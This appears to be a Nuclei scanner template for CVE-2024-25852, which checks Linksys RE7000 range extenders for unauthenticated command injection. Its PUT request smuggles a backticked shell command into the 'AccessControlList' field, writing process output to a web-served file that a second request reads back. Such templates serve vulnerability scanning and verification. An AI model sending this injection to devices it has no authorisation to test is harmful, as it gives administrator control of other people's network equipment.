Linksys RE7000 - Command Injection

id: CVE-2024-25852

info:
  name: Linksys RE7000 - Command Injection
  author: securityforeveryone
  severity: high
  description: |
    Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point
  impact: An attacker can use the vulnerability to obtain device administrator rights.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-25852
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md
    - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd
  classification:
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    vendor: Linksys
    product: RE7000
  tags: cve,cve2024,unauth,injection

variables:
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        PUT /goform/AccessControl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'
          - 'status_code_1 == 200 && status_code_2 == 200'
        condition: and
# digest: 490a0046304402202153b2db486cc766305d138e6eb3ee33f978bf43e3575d91cef771e7c0124c3102203c2180ccbd5399845dda7b300524f79435b3bef94e700d511e27e22f1abd9848:922c64590222798bb761d5b6d8e72950